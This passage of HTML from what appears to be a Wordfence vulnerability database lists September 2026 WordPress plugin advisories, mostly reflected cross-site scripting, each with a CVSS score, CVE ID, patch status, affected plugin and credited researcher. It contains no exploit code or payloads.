<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d74b0f43-02ef-4641-9b11-ef6d963941a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/918af0dc-afad-4645-b4ad-8b10a34e20b2" target="_blank" rel="noopener">Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button &lt;= 3.5.9 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18964" target="_blank" rel="noopener noreferrer">							CVE-2026-18964						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty" target="_blank" rel="noopener">Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty</a> <span class="wfvr-software-slug">[chaty]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uhcna" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d096019bcc819bd2439528b80efa04cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d096019bcc819bd2439528b80efa04cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/uhcna" target="_blank" rel="noopener">uhcna</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/918af0dc-afad-4645-b4ad-8b10a34e20b2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69c176ae-fa98-40aa-80f5-7ed2f7626398" target="_blank" rel="noopener">Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder &lt;= 1.15.46 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85645" target="_blank" rel="noopener noreferrer">							CVE-2026-85645						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-maker" target="_blank" rel="noopener">Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder</a> <span class="wfvr-software-slug">[form-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/braintx" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e6f5e1b75503b4a4d0813e7779c3bbc1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e6f5e1b75503b4a4d0813e7779c3bbc1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/braintx" target="_blank" rel="noopener">braintx</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/69c176ae-fa98-40aa-80f5-7ed2f7626398" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0965b39c-ad17-458d-93be-9b565f48183b" target="_blank" rel="noopener">Groundhogg — CRM, Newsletters, and Marketing Automation &lt; 4.7.2 &#8211; Unauthenticated Open Redirect</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81741" target="_blank" rel="noopener noreferrer">							CVE-2026-81741						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/groundhogg" target="_blank" rel="noopener">Groundhogg — CRM, Newsletters, and Marketing Automation</a> <span class="wfvr-software-slug">[groundhogg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0965b39c-ad17-458d-93be-9b565f48183b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dca6bd12-5adf-48fa-b24f-198f13250080" target="_blank" rel="noopener">HUSKY &lt;= 1.4.3 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18562" target="_blank" rel="noopener noreferrer">							CVE-2026-18562						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter" target="_blank" rel="noopener">HUSKY – Products Filter for WooCommerce Professional</a> <span class="wfvr-software-slug">[woocommerce-products-filter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dca6bd12-5adf-48fa-b24f-198f13250080" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d3908109-5c40-4099-9c6c-64627a719f00" target="_blank" rel="noopener">IPGP Visitors Origin &lt; 1.6 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81404" target="_blank" rel="noopener noreferrer">							CVE-2026-81404						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ipgp-visitors-origin" target="_blank" rel="noopener">IPGP Visitors Origin</a> <span class="wfvr-software-slug">[ipgp-visitors-origin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuln-seeker-cyber-security-team" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45191b846983773cb044799b2c43ff23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45191b846983773cb044799b2c43ff23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuln-seeker-cyber-security-team" target="_blank" rel="noopener">Vuln Seeker Cyber Security Team</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d3908109-5c40-4099-9c6c-64627a719f00" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28e45ffc-ea55-42a4-97ea-4638f640b712" target="_blank" rel="noopener">Product Filter for WooCommerce by WBW &lt;= 3.4.2 &#8211; Reflected Cross-Site Scripting via &#8216;wpf_fid&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7804" target="_blank" rel="noopener noreferrer">							CVE-2026-7804						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-product-filter" target="_blank" rel="noopener">Product Filter for WooCommerce by WBW</a> <span class="wfvr-software-slug">[woo-product-filter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28e45ffc-ea55-42a4-97ea-4638f640b712" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d07fe28c-f76e-42b2-b894-be316004235a" target="_blank" rel="noopener">Relevanssi &lt;= 4.28.1 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19985" target="_blank" rel="noopener noreferrer">							CVE-2026-19985						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/relevanssi" target="_blank" rel="noopener">Relevanssi – A Better Search</a> <span class="wfvr-software-slug">[relevanssi]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mutantgun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6fb51fd3550544e83c4b87c5131919f9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6fb51fd3550544e83c4b87c5131919f9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mutantgun" target="_blank" rel="noopener">Mutantgun</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d07fe28c-f76e-42b2-b894-be316004235a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1802a6f2-83d2-4f6d-a64b-0d9f4b4b12f7" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile &lt;= 1.42.1 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66632" target="_blank" rel="noopener noreferrer">							CVE-2026-66632						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-cloudflare-turnstile" target="_blank" rel="noopener">Simple CAPTCHA with Cloudflare Turnstile</a> <span class="wfvr-software-slug">[simple-cloudflare-turnstile]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kta1kri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e3b56b2c8ec6a4e263430c3d1595cb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e3b56b2c8ec6a4e263430c3d1595cb9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kta1kri" target="_blank" rel="noopener">kta1kri</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1802a6f2-83d2-4f6d-a64b-0d9f4b4b12f7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee8e5848-8aa8-489a-9563-aefc0aa62dec" target="_blank" rel="noopener">Themify – WooCommerce Product Filter &lt;= 1.5.5 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78172" target="_blank" rel="noopener noreferrer">							CVE-2026-78172						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-wc-product-filter" target="_blank" rel="noopener">Themify – WooCommerce Product Filter</a> <span class="wfvr-software-slug">[themify-wc-product-filter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee8e5848-8aa8-489a-9563-aefc0aa62dec" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3deeb8f5-d9a7-43cb-9068-a921ed6db2bc" target="_blank" rel="noopener">Unlimited Elements For Elementor &lt;= 2.0.16 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77150" target="_blank" rel="noopener noreferrer">							CVE-2026-77150						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">Unlimited Elements For Elementor</a> <span class="wfvr-software-slug">[unlimited-elements-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3deeb8f5-d9a7-43cb-9068-a921ed6db2bc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e1fd8f-548e-4fb2-9ee4-b24c412aaa8e" target="_blank" rel="noopener">User Access Manager &lt;= 2.3.18 &#8211; Reflected Cross-Site Scripting via &#8216;tab_group_section&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19797" target="_blank" rel="noopener noreferrer">							CVE-2026-19797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">User Access Manager</a> <span class="wfvr-software-slug">[user-access-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e1fd8f-548e-4fb2-9ee4-b24c412aaa8e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab8bd8c8-d9aa-4223-9400-4d500446b598" target="_blank" rel="noopener">WP-Members Membership Plugin &lt;= 3.5.6 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84960" target="_blank" rel="noopener noreferrer">							CVE-2026-84960						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-members" target="_blank" rel="noopener">WP-Members Membership Plugin</a> <span class="wfvr-software-slug">[wp-members]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab8bd8c8-d9aa-4223-9400-4d500446b598" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/560a3102-c274-450f-9119-ea47ee2e7c65" target="_blank" rel="noopener">Eventin &lt;= 4.1.17 &#8211; Missing Authorization to Authenticated (Subscriber+) Notification Flow Management via notification-flow REST API Endpoint</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11821" target="_blank" rel="noopener noreferrer">							CVE-2026-11821						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sushi-com-abacate" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6803b4e2b36c156a84f137891fb567ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6803b4e2b36c156a84f137891fb567ea"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sushi-com-abacate" target="_blank" rel="noopener">Sushi Com Abacate</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/560a3102-c274-450f-9119-ea47ee2e7c65" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7edc69b-363d-49df-b82b-a9ad4fe9224a" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly &lt;= 27.2 &#8211; Missing Authorization to Authenticated (Subscriber+) Limited Arbitrary Plugin Update</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2520" target="_blank" rel="noopener noreferrer">							CVE-2026-2520						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
